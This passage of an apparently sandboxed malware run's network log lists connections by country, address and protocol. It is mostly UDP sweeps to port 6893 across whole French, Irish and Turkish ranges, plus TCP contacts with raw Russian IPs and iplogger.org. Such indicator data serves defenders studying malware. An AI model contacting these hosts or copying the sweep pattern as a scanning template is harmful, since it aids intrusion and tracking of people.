| FR | 87.98.179.212:6893 | udp | |
| FR | 87.98.179.213:6893 | udp | |
| FR | 87.98.179.214:6893 | udp | |
| FR | 87.98.179.215:6893 | udp | |
| FR | 87.98.179.216:6893 | udp | |
| FR | 87.98.179.217:6893 | udp | |
| FR | 87.98.179.218:6893 | udp | |
| FR | 87.98.179.219:6893 | udp | |
| FR | 87.98.179.220:6893 | udp | |
| FR | 87.98.179.221:6893 | udp | |
| FR | 87.98.179.222:6893 | udp | |
| FR | 87.98.179.223:6893 | udp | |
| FR | 87.98.179.224:6893 | udp | |
| FR | 87.98.179.225:6893 | udp | |
| FR | 87.98.179.226:6893 | udp | |
| FR | 87.98.179.227:6893 | udp | |
| FR | 87.98.179.228:6893 | udp | |
| FR | 87.98.179.229:6893 | udp | |
| FR | 87.98.179.230:6893 | udp | |
| FR | 87.98.179.231:6893 | udp | |
| FR | 87.98.179.232:6893 | udp | |
| FR | 87.98.179.233:6893 | udp | |
| FR | 87.98.179.234:6893 | udp | |
| FR | 87.98.179.235:6893 | udp | |
| FR | 87.98.179.236:6893 | udp | |
| FR | 87.98.179.237:6893 | udp | |
| FR | 87.98.179.238:6893 | udp | |
| FR | 87.98.179.239:6893 | udp | |
| FR | 87.98.179.240:6893 | udp | |
| FR | 87.98.179.241:6893 | udp | |
| FR | 87.98.179.242:6893 | udp | |
| FR | 87.98.179.243:6893 | udp | |
| FR | 87.98.179.244:6893 | udp | |
| FR | 87.98.179.245:6893 | udp | |
| FR | 87.98.179.246:6893 | udp | |
| FR | 87.98.179.247:6893 | udp | |
| FR | 87.98.179.248:6893 | udp | |
| FR | 87.98.179.249:6893 | udp | |
| FR | 87.98.179.250:6893 | udp | |
| FR | 87.98.179.251:6893 | udp | |
| FR | 87.98.179.252:6893 | udp | |
| FR | 87.98.179.253:6893 | udp | |
| FR | 87.98.179.254:6893 | udp | |
| FR | 87.98.179.255:6893 | udp | |
| RU | 185.172.128.8:80 | 185.172.128.8 | tcp |
| US | 208.83.223.34:80 | tcp | |
| US | 104.21.4.208:443 | iplogger.org | tcp |
| US | 104.21.4.208:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| GB | 96.17.179.184:80 | apps.identrust.com | tcp |
| GB | 96.17.179.205:80 | apps.identrust.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| RU | 77.91.68.21:80 | 77.91.68.21 | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 8.8.8.8:53 | x2.c.lencr.org | udp |
| US | 8.8.8.8:53 | x2.c.lencr.org | udp |
| GB | 173.222.13.40:80 | x2.c.lencr.org | tcp |
| GB | 173.222.13.40:80 | x2.c.lencr.org | tcp |
| IE | 93.107.12.0:6893 | udp | |
| IE | 93.107.12.1:6893 | udp | |
| IE | 93.107.12.2:6893 | udp | |
| IE | 93.107.12.3:6893 | udp | |
| IE | 93.107.12.4:6893 | udp | |
| IE | 93.107.12.5:6893 | udp | |
| IE | 93.107.12.6:6893 | udp | |
| IE | 93.107.12.7:6893 | udp | |
| IE | 93.107.12.8:6893 | udp | |
| IE | 93.107.12.9:6893 | udp | |
| IE | 93.107.12.10:6893 | udp | |
| IE | 93.107.12.11:6893 | udp | |
| IE | 93.107.12.12:6893 | udp | |
| IE | 93.107.12.13:6893 | udp | |
| IE | 93.107.12.14:6893 | udp | |
| IE | 93.107.12.15:6893 | udp | |
| IE | 93.107.12.16:6893 | udp | |
| IE | 93.107.12.17:6893 | udp | |
| IE | 93.107.12.18:6893 | udp | |
| IE | 93.107.12.19:6893 | udp | |
| IE | 93.107.12.20:6893 | udp | |
| IE | 93.107.12.21:6893 | udp | |
| IE | 93.107.12.22:6893 | udp | |
| IE | 93.107.12.23:6893 | udp | |
| IE | 93.107.12.24:6893 | udp | |
| IE | 93.107.12.25:6893 | udp | |
| IE | 93.107.12.26:6893 | udp | |
| IE | 93.107.12.27:6893 | udp | |
| IE | 93.107.12.28:6893 | udp | |
| IE | 93.107.12.29:6893 | udp | |
| IE | 93.107.12.30:6893 | udp | |
| IE | 93.107.12.31:6893 | udp | |
| TR | 95.1.200.0:6893 | udp | |
| TR | 95.1.200.1:6893 | udp | |
| TR | 95.1.200.2:6893 | udp | |
| TR | 95.1.200.3:6893 | udp | |
| TR | 95.1.200.4:6893 | udp | |
| TR | 95.1.200.5:6893 | udp | |
| TR | 95.1.200.6:6893 | udp | |
| TR | 95.1.200.7:6893 | udp | |
| TR | 95.1.200.8:6893 | udp | |
| TR | 95.1.200.9:6893 | udp | |
| TR | 95.1.200.10:6893 | udp | |
| TR | 95.1.200.11:6893 | udp | |
| TR | 95.1.200.12:6893 | udp | |
| TR | 95.1.200.13:6893 | udp | |
| TR | 95.1.200.14:6893 | udp | |
| TR | 95.1.200.15:6893 | udp | |
| TR | 95.1.200.16:6893 | udp | |
| TR | 95.1.200.17:6893 | udp | |
| TR | 95.1.200.18:6893 | udp | |
| TR | 95.1.200.19:6893 | udp | |
| TR | 95.1.200.20:6893 | udp | |
| TR | 95.1.200.21:6893 | udp | |
| TR | 95.1.200.22:6893 | udp | |
| TR | 95.1.200.23:6893 | udp | |
| TR | 95.1.200.24:6893 | udp | |
| TR | 95.1.200.25:6893 | udp | |
| TR | 95.1.200.26:6893 | udp | |
| TR | 95.1.200.27:6893 | udp | |
| TR | 95.1.200.28:6893 | udp | |
| TR | 95.1.200.29:6893 | udp | |
| TR | 95.1.200.30:6893 | udp | |
| TR | 95.1.200.31:6893 | udp | |
| FR | 87.98.176.0:6893 | udp | |
| FR | 87.98.176.1:6893 | udp | |
| FR | 87.98.176.2:6893 | udp | |
| FR | 87.98.176.3:6893 | udp | |
| FR | 87.98.176.4:6893 | udp | |
| FR | 87.98.176.5:6893 | udp | |
| FR | 87.98.176.6:6893 | udp | |
| FR | 87.98.176.7:6893 | udp | |
| FR | 87.98.176.8:6893 | udp | |
| FR | 87.98.176.9:6893 | udp | |
| FR | 87.98.176.10:6893 | udp | |
| FR | 87.98.176.11:6893 | udp | |
| FR | 87.98.176.12:6893 | udp | |
| FR | 87.98.176.13:6893 | udp | |
| FR | 87.98.176.14:6893 | udp | |
| FR | 87.98.176.15:6893 | udp | |
| FR | 87.98.176.16:6893 | udp | |
| FR | 87.98.176.17:6893 | udp | |
| FR | 87.98.176.18:6893 | udp | |
| FR | 87.98.176.19:6893 | udp | |
| FR | 87.98.176.20:6893 | udp | |
| FR | 87.98.176.21:6893 | udp | |
| FR | 87.98.176.22:6893 | udp | |
| FR | 87.98.176.23:6893 | udp | |
| FR | 87.98.176.24:6893 | udp | |
| FR | 87.98.176.25:6893 | udp | |
| FR | 87.98.176.26:6893 | udp | |
| FR | 87.98.176.27:6893 | udp | |
| FR | 87.98.176.28:6893 | udp | |
| FR | 87.98.176.29:6893 | udp | |
| FR | 87.98.176.30:6893 | udp | |
| FR | 87.98.176.31:6893 | udp | |
| FR | 87.98.176.32:6893 | udp | |
| FR | 87.98.176.33:6893 | udp | |
| FR | 87.98.176.34:6893 | udp | |
| FR | 87.98.176.35:6893 | udp | |
| FR | 87.98.176.36:6893 | udp | |
| FR | 87.98.176.37:6893 | udp | |
| FR | 87.98.176.38:6893 | udp | |
| FR | 87.98.176.39:6893 | udp | |
| FR | 87.98.176.40:6893 | udp | |
| FR | 87.98.176.41:6893 | udp | |
| FR | 87.98.176.42:6893 | udp | |
| FR | 87.98.176.43:6893 | udp | |
| FR | 87.98.176.44:6893 | udp | |
| FR | 87.98.176.45:6893 | udp | |
| FR | 87.98.176.46:6893 | udp | |
| FR | 87.98.176.47:6893 | udp | |
| FR | 87.98.176.48:6893 | udp | |
| FR | 87.98.176.49:6893 | udp | |
| FR | 87.98.176.50:6893 | udp | |
| FR | 87.98.176.51:6893 | udp | |
| FR | 87.98.176.52:6893 | udp | |
| FR | 87.98.176.53:6893 | udp | |
| FR | 87.98.176.54:6893 | udp | |
| FR | 87.98.176.55:6893 | udp | |
| FR | 87.98.176.56:6893 | udp | |
| FR | 87.98.176.57:6893 | udp | |
| FR | 87.98.176.58:6893 | udp | |
| FR | 87.98.176.59:6893 | udp | |
| FR | 87.98.176.60:6893 | udp | |
| FR | 87.98.176.61:6893 | udp | |
| FR | 87.98.176.62:6893 | udp | |
| FR | 87.98.176.63:6893 | udp | |
| FR | 87.98.176.64:6893 | udp | |
| FR | 87.98.176.65:6893 | udp | |
| FR | 87.98.176.66:6893 | udp | |
| FR | 87.98.176.67:6893 | udp | |
| FR | 87.98.176.68:6893 | udp | |
| FR | 87.98.176.69:6893 | udp | |
| FR | 87.98.176.70:6893 | udp | |
| FR | 87.98.176.71:6893 | udp | |
| FR | 87.98.176.72:6893 | udp | |
| FR | 87.98.176.73:6893 | udp | |
| FR | 87.98.176.74:6893 | udp | |
| FR | 87.98.176.75:6893 | udp | |
| FR | 87.98.176.76:6893 | udp | |
| FR | 87.98.176.77:6893 | udp | |
| FR | 87.98.176.78:6893 | udp | |
| FR | 87.98.176.79:6893 | udp | |
| FR | 87.98.176.80:6893 | udp | |
| FR | 87.98.176.81:6893 | udp | |
| FR | 87.98.176.82:6893 | udp | |
| FR | 87.98.176.83:6893 | udp | |
| FR | 87.98.176.84:6893 | udp | |
| FR | 87.98.176.85:6893 | udp | |
| FR | 87.98.176.86:6893 | udp | |
| FR | 87.98.176.87:6893 | udp | |
| FR | 87.98.176.88:6893 | udp | |
| FR | 87.98.176.89:6893 | udp | |
| FR | 87.98.176.90:6893 | udp | |
| FR | 87.98.176.91:6893 | udp | |
| FR | 87.98.176.92:6893 | udp | |
| FR | 87.98.176.93:6893 | udp | |
| FR | 87.98.176.94:6893 | udp | |
| FR | 87.98.176.95:6893 | udp | |
| FR | 87.98.176.96:6893 | udp | |
| FR | 87.98.176.97:6893 | udp | |
| FR | 87.98.176.98:6893 | udp | |
| FR | 87.98.176.99:6893 | udp | |
| FR | 87.98.176.100:6893 | udp | |
| FR | 87.98.176.101:6893 | udp | |
| FR | 87.98.176.102:6893 | udp | |
| FR | 87.98.176.103:6893 | udp | |
| FR | 87.98.176.104:6893 | udp | |
| FR | 87.98.176.105:6893 | udp | |
| FR | 87.98.176.106:6893 | udp | |
| FR | 87.98.176.107:6893 | udp | |
| FR | 87.98.176.108:6893 | udp | |
| FR | 87.98.176.109:6893 | udp | |
| FR | 87.98.176.110:6893 | udp | |
| FR | 87.98.176.111:6893 | udp | |
| FR | 87.98.176.112:6893 | udp | |
| FR | 87.98.176.113:6893 | udp | |
| FR | 87.98.176.114:6893 | udp | |
| FR | 87.98.176.115:6893 | udp | |
| FR | 87.98.176.116:6893 | udp | |
| FR | 87.98.176.117:6893 | udp | |
| FR | 87.98.176.118:6893 | udp | |
| FR | 87.98.176.119:6893 | udp | |
| FR | 87.98.176.120:6893 | udp | |
| FR | 87.98.176.121:6893 | udp | |
| FR | 87.98.176.122:6893 | udp | |
| FR | 87.98.176.123:6893 | udp | |
| FR | 87.98.176.124:6893 | udp | |
| FR | 87.98.176.125:6893 | udp | |
| FR | 87.98.176.126:6893 | udp | |
| FR | 87.98.176.127:6893 | udp | |
| FR | 87.98.176.128:6893 | udp | |
| FR | 87.98.176.129:6893 | udp | |
| FR | 87.98.176.130:6893 | udp | |
| FR | 87.98.176.131:6893 | udp | |
| FR | 87.98.176.132:6893 | udp | |
| FR | 87.98.176.133:6893 | udp | |
| FR | 87.98.176.134:6893 | udp | |
| FR | 87.98.176.135:6893 | udp | |
| FR | 87.98.176.136:6893 | udp | |
| FR | 87.98.176.137:6893 | udp | |
| FR | 87.98.176.138:6893 | udp | |
| FR | 87.98.176.139:6893 | udp | |
| FR | 87.98.176.140:6893 | udp | |
| FR | 87.98.176.141:6893 | udp | |
| FR | 87.98.176.142:6893 | udp | |
| FR | 87.98.176.143:6893 | udp | |
| FR | 87.98.176.144:6893 | udp | |
| FR | 87.98.176.145:6893 | udp | |
| FR | 87.98.176.146:6893 | udp | |
| FR | 87.98.176.147:6893 | udp | |
| FR | 87.98.176.148:6893 | udp | |
| FR | 87.98.176.149:6893 | udp | |
| FR | 87.98.176.150:6893 | udp | |
| FR | 87.98.176.151:6893 | udp | |
| FR | 87.98.176.152:6893 | udp | |
| FR | 87.98.176.153:6893 | udp | |
| FR | 87.98.176.154:6893 | udp | |
| FR | 87.98.176.155:6893 | udp | |
| FR | 87.98.176.156:6893 | udp | |
| FR | 87.98.176.157:6893 | udp | |
| FR | 87.98.176.158:6893 | udp | |
| FR | 87.98.176.159:6893 | udp | |
| FR | 87.98.176.160:6893 | udp | |
| FR | 87.98.176.161:6893 | udp | |
| FR | 87.98.176.162:6893 | udp | |
| FR | 87.98.176.163:6893 | udp | |
| FR | 87.98.176.164:6893 | udp | |
| FR | 87.98.176.165:6893 | udp | |
| FR | 87.98.176.166:6893 | udp | |
| FR | 87.98.176.167:6893 | udp | |
| FR | 87.98.176.168:6893 | udp | |
| FR | 87.98.176.169:6893 | udp | |
| FR | 87.98.176.170:6893 | udp | |
| FR | 87.98.176.171:6893 | udp | |
| FR | 87.98.176.172:6893 | udp | |
| FR | 87.98.176.173:6893 | udp | |
| FR | 87.98.176.174:6893 | udp | |
| FR | 87.98.176.175:6893 | udp | |
| FR | 87.98.176.176:6893 | udp | |
| FR | 87.98.176.177:6893 | udp | |
| FR | 87.98.176.178:6893 | udp | |
| FR | 87.98.176.179:6893 | udp | |
| FR | 87.98.176.180:6893 | udp | |
| FR | 87.98.176.181:6893 | udp | |
| FR | 87.98.176.182:6893 | udp | |
| FR | 87.98.176.183:6893 | udp | |
| FR | 87.98.176.184:6893 | udp | |
| FR | 87.98.176.185:6893 | udp | |
| FR | 87.98.176.186:6893 | udp | |
| FR | 87.98.176.187:6893 | udp | |
| FR | 87.98.176.188:6893 | udp | |
| FR | 87.98.176.189:6893 | udp | |
| FR | 87.98.176.190:6893 | udp | |
| FR | 87.98.176.191:6893 | udp | |
| FR | 87.98.176.192:6893 | udp | |
| FR | 87.98.176.193:6893 | udp | |
| FR | 87.98.176.194:6893 | udp | |
| FR | 87.98.176.195:6893 | udp | |
| FR | 87.98.176.196:6893 | udp | |
| FR | 87.98.176.197:6893 | udp | |
| FR | 87.98.176.198:6893 | udp | |
| FR | 87.98.176.199:6893 | udp | |
| FR | 87.98.176.200:6893 | udp | |
| FR | 87.98.176.201:6893 | udp | |
| FR | 87.98.176.202:6893 | udp | |
| FR | 87.98.176.203:6893 | udp | |
| FR | 87.98.176.204:6893 | udp | |
| FR | 87.98.176.205:6893 | udp | |
| FR | 87.98.176.206:6893 | udp | |
| FR | 87.98.176.207:6893 | udp | |
| FR | 87.98.176.208:6893 | udp | |
| FR | 87.98.176.209:6893 | udp | |
| FR | 87.98.176.210:6893 | udp | |
| FR | 87.98.176.211:6893 | udp | |
| FR | 87.98.176.212:6893 | udp | |
| FR | 87.98.176.213:6893 | udp | |
| FR | 87.98.176.214:6893 | udp | |
| FR | 87.98.176.215:6893 | udp | |
| FR | 87.98.176.216:6893 | udp | |
| FR | 87.98.176.217:6893 | udp | |
| FR | 87.98.176.218:6893 | udp | |
| FR | 87.98.176.219:6893 | udp | |
| FR | 87.98.176.220:6893 | udp | |
| FR | 87.98.176.221:6893 | udp | |
| FR | 87.98.176.222:6893 | udp | |
| FR | 87.98.176.223:6893 | udp | |
| FR | 87.98.176.224:6893 | udp | |
| FR | 87.98.176.225:6893 | udp | |
| FR | 87.98.176.226:6893 | udp | |
| FR | 87.98.176.227:6893 | udp | |
| FR | 87.98.176.228:6893 | udp | |
| FR | 87.98.176.229:6893 | udp | |
| FR | 87.98.176.230:6893 | udp | |
| FR | 87.98.176.231:6893 | udp | |
| FR | 87.98.176.232:6893 | udp | |
| FR | 87.98.176.233:6893 | udp | |
| FR | 87.98.176.234:6893 | udp | |
| FR | 87.98.176.235:6893 | udp | |
| FR | 87.98.176.236:6893 | udp | |
| FR | 87.98.176.237:6893 | udp | |
| FR | 87.98.176.238:6893 | udp | |
| FR | 87.98.176.239:6893 | udp | |
| FR | 87.98.176.240:6893 | udp | |
| FR | 87.98.176.241:6893 | udp | |
| FR | 87.98.176.242:6893 | udp | |
| FR | 87.98.176.243:6893 | udp | |
| FR | 87.98.176.244:6893 | udp | |
| FR | 87.98.176.245:6893 | udp | |
| FR | 87.98.176.246:6893 | udp | |
| FR | 87.98.176.247:6893 | udp | |
| FR | 87.98.176.248:6893 | udp | |
| FR | 87.98.176.249:6893 | udp | |
| FR | 87.98.176.250:6893 | udp | |
| FR | 87.98.176.251:6893 | udp | |
| FR | 87.98.176.252:6893 | udp | |
| FR | 87.98.176.253:6893 | udp | |
| FR | 87.98.176.254:6893 | udp | |
| FR | 87.98.176.255:6893 | udp | |
| FR | 87.98.177.0:6893 | udp | |
| FR | 87.98.177.1:6893 | udp | |
| FR | 87.98.177.2:6893 | udp | |
| FR | 87.98.177.3:6893 | udp | |
| FR | 87.98.177.4:6893 | udp | |
| FR | 87.98.177.5:6893 | udp | |
| FR | 87.98.177.6:6893 | udp | |
| FR | 87.98.177.7:6893 | udp | |
| FR | 87.98.177.8:6893 | udp | |
| FR | 87.98.177.9:6893 | udp | |
| FR | 87.98.177.10:6893 | udp | |
| FR | 87.98.177.11:6893 | udp | |
| FR | 87.98.177.12:6893 | udp | |
| FR | 87.98.177.13:6893 | udp | |
| FR | 87.98.177.14:6893 | udp | |
| FR | 87.98.177.15:6893 | udp | |
| FR | 87.98.177.16:6893 | udp | |
| FR | 87.98.177.17:6893 | udp | |
| FR | 87.98.177.18:6893 | udp | |
| FR | 87.98.177.19:6893 | udp | |
| FR | 87.98.177.20:6893 | udp | |
| FR | 87.98.177.21:6893 | udp | |
| FR | 87.98.177.22:6893 | udp | |
| FR | 87.98.177.23:6893 | udp | |
| FR | 87.98.177.24:6893 | udp | |
| FR | 87.98.177.25:6893 | udp | |
| FR | 87.98.177.26:6893 | udp | |
| FR | 87.98.177.27:6893 | udp | |
| FR | 87.98.177.28:6893 | udp | |
| FR | 87.98.177.29:6893 | udp | |
| FR | 87.98.177.30:6893 | udp | |
| FR | 87.98.177.31:6893 | udp | |
| FR | 87.98.177.32:6893 | udp | |
| FR | 87.98.177.33:6893 | udp | |
| FR | 87.98.177.34:6893 | udp | |
| FR | 87.98.177.35:6893 | udp | |
| FR | 87.98.177.36:6893 | udp | |
| FR | 87.98.177.37:6893 | udp | |
| FR | 87.98.177.38:6893 | udp | |
| FR | 87.98.177.39:6893 | udp | |
| FR | 87.98.177.40:6893 | udp | |
| FR | 87.98.177.41:6893 | udp | |
| FR | 87.98.177.42:6893 | udp | |
| FR | 87.98.177.43:6893 | udp | |
| FR | 87.98.177.44:6893 | udp | |
| FR | 87.98.177.45:6893 | udp | |
| FR | 87.98.177.46:6893 | udp | |
| FR | 87.98.177.47:6893 | udp | |
| FR | 87.98.177.48:6893 | udp | |
| FR | 87.98.177.49:6893 | udp | |
| FR | 87.98.177.50:6893 | udp | |
| FR | 87.98.177.51:6893 | udp | |
| FR | 87.98.177.52:6893 | udp | |
| FR | 87.98.177.53:6893 | udp | |
| FR | 87.98.177.54:6893 | udp | |
| FR | 87.98.177.55:6893 | udp | |
| FR | 87.98.177.56:6893 | udp | |
| FR | 87.98.177.57:6893 | udp | |
| FR | 87.98.177.58:6893 | udp | |
| FR | 87.98.177.59:6893 | udp | |
| FR | 87.98.177.60:6893 | udp | |
| FR | 87.98.177.61:6893 | udp | |
| FR | 87.98.177.62:6893 | udp | |
| FR | 87.98.177.63:6893 | udp | |
| FR | 87.98.177.64:6893 | udp | |
| FR | 87.98.177.65:6893 | udp | |
| FR | 87.98.177.66:6893 | udp | |
| FR | 87.98.177.67:6893 | udp | |
| FR | 87.98.177.68:6893 | udp | |
| FR | 87.98.177.69:6893 | udp | |
| FR | 87.98.177.70:6893 | udp | |
| FR | 87.98.177.71:6893 | udp | |
| FR | 87.98.177.72:6893 | udp | |
| FR | 87.98.177.73:6893 | udp | |
| FR | 87.98.177.74:6893 | udp | |
| FR | 87.98.177.75:6893 | udp | |
| FR | 87.98.177.76:6893 | udp | |
| FR | 87.98.177.77:6893 | udp | |
| FR | 87.98.177.78:6893 | udp | |
| FR | 87.98.177.79:6893 | udp | |
| FR | 87.98.177.80:6893 | udp | |
| FR | 87.98.177.81:6893 | udp | |
| FR | 87.98.177.82:6893 | udp | |
| FR | 87.98.177.83:6893 | udp | |
| FR | 87.98.177.84:6893 | udp | |
| FR | 87.98.177.85:6893 | udp | |
| FR | 87.98.177.86:6893 | udp | |
| FR | 87.98.177.87:6893 | udp | |
| FR | 87.98.177.88:6893 | udp | |
| FR | 87.98.177.89:6893 | udp | |
| FR | 87.98.177.90:6893 | udp | |
| FR | 87.98.177.91:6893 | udp | |
| FR | 87.98.177.92:6893 | udp | |
| FR | 87.98.177.93:6893 | udp | |
| FR | 87.98.177.94:6893 | udp | |
| FR | 87.98.177.95:6893 | udp | |
| FR | 87.98.177.96:6893 | udp | |
| FR | 87.98.177.97:6893 | udp | |
| FR | 87.98.177.98:6893 | udp | |
| FR | 87.98.177.99:6893 | udp | |
| FR | 87.98.177.100:6893 | udp | |
| FR | 87.98.177.101:6893 | udp | |
| FR | 87.98.177.102:6893 | udp | |
| FR | 87.98.177.103:6893 | udp | |
| FR | 87.98.177.104:6893 | udp | |
| FR | 87.98.177.105:6893 | udp | |
| FR | 87.98.177.106:6893 | udp | |
| FR | 87.98.177.107:6893 | udp | |
| FR | 87.98.177.108:6893 | udp | |
| FR | 87.98.177.109:6893 | udp | |
| FR | 87.98.177.110:6893 | udp | |
| FR | 87.98.177.111:6893 | udp | |
| FR | 87.98.177.112:6893 | udp | |
| FR | 87.98.177.113:6893 | udp | |
| FR | 87.98.177.114:6893 | udp | |
| FR | 87.98.177.115:6893 | udp | |
| FR | 87.98.177.116:6893 | udp | |
| FR | 87.98.177.117:6893 | udp | |
| FR | 87.98.177.118:6893 | udp | |
| FR | 87.98.177.119:6893 | udp | |
| FR | 87.98.177.120:6893 | udp | |
| FR | 87.98.177.121:6893 | udp | |
| FR | 87.98.177.122:6893 | udp | |
| FR | 87.98.177.123:6893 | udp | |
| FR | 87.98.177.124:6893 | udp | |
| FR | 87.98.177.125:6893 | udp | |
| FR | 87.98.177.126:6893 | udp | |
| FR | 87.98.177.127:6893 | udp | |
| FR | 87.98.177.128:6893 | udp | |
| FR | 87.98.177.129:6893 | udp | |
| FR | 87.98.177.130:6893 | udp | |
| FR | 87.98.177.131:6893 | udp | |
| FR | 87.98.177.132:6893 | udp | |
| FR | 87.98.177.133:6893 | udp | |
| FR | 87.98.177.134:6893 | udp | |
| FR | 87.98.177.135:6893 | udp | |
| FR | 87.98.177.136:6893 | udp | |
| FR | 87.98.177.137:6893 | udp | |
| FR | 87.98.177.138:6893 | udp | |
| FR | 87.98.177.139:6893 | udp | |
| FR | 87.98.177.140:6893 | udp | |
| FR | 87.98.177.141:6893 | udp | |
| FR | 87.98.177.142:6893 | udp | |
| FR | 87.98.177.143:6893 | udp | |
| FR | 87.98.177.144:6893 | udp | |
| FR | 87.98.177.145:6893 | udp | |
| FR | 87.98.177.146:6893 | udp | |
| FR | 87.98.177.147:6893 | udp | |
| FR | 87.98.177.148:6893 | udp | |
| FR | 87.98.177.149:6893 | udp | |
| FR | 87.98.177.150:6893 | udp | |
| FR | 87.98.177.151:6893 | udp | |
| FR | 87.98.177.152:6893 | udp | |
| FR | 87.98.177.153:6893 | udp | |
| FR | 87.98.177.154:6893 | udp | |
| FR | 87.98.177.155:6893 | udp | |
| FR | 87.98.177.156:6893 | udp | |
| FR | 87.98.177.157:6893 | udp | |
| FR | 87.98.177.158:6893 | udp | |
| FR | 87.98.177.159:6893 | udp | |
| FR | 87.98.177.160:6893 | udp | |
| FR | 87.98.177.161:6893 | udp | |
| FR | 87.98.177.162:6893 | udp | |
| FR | 87.98.177.163:6893 | udp | |
| FR | 87.98.177.164:6893 | udp | |
| FR | 87.98.177.165:6893 | udp | |
| FR | 87.98.177.166:6893 | udp | |
| FR | 87.98.177.167:6893 | udp | |
| FR | 87.98.177.168:6893 | udp | |
| FR | 87.98.177.169:6893 | udp | |
| FR | 87.98.177.170:6893 | udp | |
| FR | 87.98.177.171:6893 | udp | |
| FR | 87.98.177.172:6893 | udp | |
| FR | 87.98.177.173:6893 | udp | |
| FR | 87.98.177.174:6893 | udp | |
| FR | 87.98.177.175:6893 | udp | |
| FR | 87.98.177.176:6893 | udp | |
| FR | 87.98.177.177:6893 | udp | |
| FR | 87.98.177.178:6893 | udp | |
| FR | 87.98.177.179:6893 | udp | |
| FR | 87.98.177.180:6893 | udp | |
| FR | 87.98.177.181:6893 | udp | |
| FR | 87.98.177.182:6893 | udp | |
| FR | 87.98.177.183:6893 | udp | |
| FR | 87.98.177.184:6893 | udp | |
| FR | 87.98.177.185:6893 | udp | |
| FR | 87.98.177.186:6893 | udp | |
| FR | 87.98.177.187:6893 | udp | |
| FR | 87.98.177.188:6893 | udp | |
| FR | 87.98.177.189:6893 | udp | |
| FR | 87.98.177.190:6893 | udp | |
| FR | 87.98.177.191:6893 | udp | |
| FR | 87.98.177.192:6893 | udp | |
| FR | 87.98.177.193:6893 | udp | |
| FR | 87.98.177.194:6893 | udp | |
| FR | 87.98.177.195:6893 | udp | |
| FR | 87.98.177.196:6893 | udp | |
| FR | 87.98.177.197:6893 | udp | |
| FR | 87.98.177.198:6893 | udp | |
| FR | 87.98.177.199:6893 | udp | |
| FR | 87.98.177.200:6893 | udp | |
| FR | 87.98.177.201:6893 | udp | |
| FR | 87.98.177.202:6893 | udp | |
| FR | 87.98.177.203:6893 | udp | |
| FR | 87.98.177.204:6893 | udp | |
| FR | 87.98.177.205:6893 | udp | |
| FR | 87.98.177.206:6893 | udp | |
| FR | 87.98.177.207:6893 | udp | |
| FR | 87.98.177.208:6893 | udp | |
| FR | 87.98.177.209:6893 | udp | |
| FR | 87.98.177.210:6893 | udp | |
| FR | 87.98.177.211:6893 | udp | |
| FR | 87.98.177.212:6893 | udp | |
| FR | 87.98.177.213:6893 | udp | |
| FR | 87.98.177.214:6893 | udp | |
| FR | 87.98.177.215:6893 | udp | |
| FR | 87.98.177.216:6893 | udp | |
| FR | 87.98.177.217:6893 | udp | |
| FR | 87.98.177.218:6893 | udp | |
| FR | 87.98.177.219:6893 | udp | |
| FR | 87.98.177.220:6893 | udp | |
| FR | 87.98.177.221:6893 | udp | |
| FR | 87.98.177.222:6893 | udp | |
| FR | 87.98.177.223:6893 | udp | |
| FR | 87.98.177.224:6893 | udp | |
| FR | 87.98.177.225:6893 | udp | |
| FR | 87.98.177.226:6893 | udp | |
| FR | 87.98.177.227:6893 | udp | |
| FR | 87.98.177.228:6893 | udp | |
| FR | 87.98.177.229:6893 | udp | |
| FR | 87.98.177.230:6893 | udp | |
| FR | 87.98.177.231:6893 | udp | |
| FR | 87.98.177.232:6893 | udp | |
| FR | 87.98.177.233:6893 | udp | |
| FR | 87.98.177.234:6893 | udp | |
| FR | 87.98.177.235:6893 | udp | |
| FR | 87.98.177.236:6893 | udp | |
| FR | 87.98.177.237:6893 | udp | |
| FR | 87.98.177.238:6893 | udp | |
| FR | 87.98.177.239:6893 | udp | |
| FR | 87.98.177.240:6893 | udp | |
| FR | 87.98.177.241:6893 | udp | |
| FR | 87.98.177.242:6893 | udp | |
| FR | 87.98.177.243:6893 | udp | |
| FR | 87.98.177.244:6893 | udp | |
| FR | 87.98.177.245:6893 | udp | |
| FR | 87.98.177.246:6893 | udp | |
| FR | 87.98.177.247:6893 | udp | |
| FR | 87.98.177.248:6893 | udp | |
| FR | 87.98.177.249:6893 | udp | |
| FR | 87.98.177.250:6893 | udp | |
| FR | 87.98.177.251:6893 | udp | |
| FR | 87.98.177.252:6893 | udp | |
| FR | 87.98.177.253:6893 | udp | |
| FR | 87.98.177.254:6893 | udp | |
| FR | 87.98.177.255:6893 | udp | |
| FR | 87.98.178.0:6893 | udp | |
| FR | 87.98.178.1:6893 | udp | |
| FR | 87.98.178.2:6893 | udp | |
| FR | 87.98.178.3:6893 | udp | |
| FR | 87.98.178.4:6893 | udp | |
| FR | 87.98.178.5:6893 | udp | |
| FR | 87.98.178.6:6893 | udp | |
| FR | 87.98.178.7:6893 | udp | |
| FR | 87.98.178.8:6893 | udp | |
| FR | 87.98.178.9:6893 | udp | |
| FR | 87.98.178.10:6893 | udp | |
| FR | 87.98.178.11:6893 | udp | |
| FR | 87.98.178.12:6893 | udp | |
| FR | 87.98.178.13:6893 | udp | |
| FR | 87.98.178.14:6893 | udp | |
| FR | 87.98.178.15:6893 | udp | |
| FR | 87.98.178.16:6893 | udp | |
| FR | 87.98.178.17:6893 | udp | |
| FR | 87.98.178.18:6893 | udp | |
| FR | 87.98.178.19:6893 | udp | |
| FR | 87.98.178.20:6893 | udp | |
| FR | 87.98.178.21:6893 | udp | |
| FR | 87.98.178.22:6893 | udp | |
| FR | 87.98.178.23:6893 | udp | |
| FR | 87.98.178.24:6893 | udp | |
| FR | 87.98.178.25:6893 | udp | |
| FR | 87.98.178.26:6893 | udp | |
| FR | 87.98.178.27:6893 | udp | |
| FR | 87.98.178.28:6893 | udp | |
| FR | 87.98.178.29:6893 | udp | |
| FR | 87.98.178.30:6893 | udp | |
| FR | 87.98.178.31:6893 | udp | |
| FR | 87.98.178.32:6893 | udp | |
| FR | 87.98.178.33:6893 | udp | |
| FR | 87.98.178.34:6893 | udp | |
| FR | 87.98.178.35:6893 | udp | |
| FR | 87.98.178.36:6893 | udp | |
| FR | 87.98.178.37:6893 | udp | |
| FR | 87.98.178.38:6893 | udp | |
| FR | 87.98.178.39:6893 | udp | |
